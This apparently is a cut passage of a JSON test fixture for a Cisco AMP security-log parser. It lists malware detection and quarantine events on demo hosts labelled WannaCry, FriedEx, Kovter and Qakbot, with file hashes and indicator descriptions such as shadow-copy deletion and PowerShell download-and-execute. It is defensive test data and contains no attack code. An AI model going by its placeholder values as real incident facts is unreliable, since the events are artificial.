"ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179213462437901", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 361000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 36650, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503300", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 37836, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503298", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 40302, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503301", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179217757405000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 41422, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437902", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 893000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 42542, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179213462437899", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 456000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 43815, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419179204872503299", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179213462438000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 45179, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470602", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 957000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 46299, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.ED01EBFBC9-100.SBX.TG", + "cisco.amp.detection_id": "6419179209167470598", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47663, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T11:26:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419179209167470601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 941000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419179209167471000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49034, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.MAP.Ransomware.rewrite", + "cisco.amp.detection_id": "6583840593074454529", + "cisco.amp.event_type_id": 1090519105, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 231000000, + "event.action": "Malicious Activity Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6583840597369422000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "75a758a0c5cea48c9922d64a113d0f9d", + "file.hash.sha1": "c78f4c22dd195a1791472a2c271a0c85b53900d9", + "file.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "file.name": "mscorsvw.exe", + "file.path": "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52012, + "process.hash.md5": "71c85477df9347fe8e7bc55768473fca", + "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378", + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "process.name": "services.exe", + "process.pid": 480, + "related.hash": [ + "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "75a758a0c5cea48c9922d64a113d0f9d", + "c78f4c22dd195a1791472a2c271a0c85b53900d9" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:59:30.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 182000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6701398782847286000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:59:30.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "file:///C%3A/Windows/SysWOW64/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 53662, + "process.hash.sha256": "90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:55:07.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellEncodedBuffer.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 260000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 7007136036637603000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:55:07.000Z", + "file.hash.sha256": "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386", + "file.name": "cmd.exe", + "file.path": "file:///C%3A/Windows/system32/cmd.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 55441, + "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536", + "related.hash": [ + "db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386" + ], + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 250000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066250000100, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 57151, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:47:17.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "b6:9c:d0:89:b8:66" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "b6:9c:d0:89:b8:66" + ], + "cisco.amp.timestamp_nanoseconds": 228000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1476905066228000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:47:17.000Z", + "file.hash.sha256": "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Command_Line_Arguments_Kovter", + "host.name": "Demo_Command_Line_Arguments_Kovter", + "input.type": "log", + "log.offset": 58928, + "process.hash.sha256": "9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff", + "related.hash": [ + "8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa" + ], + "related.hosts": [ + "Demo_Command_Line_Arguments_Kovter" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647106", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 60601, + "related.hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411425813945647105", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 758000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411425813945647000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 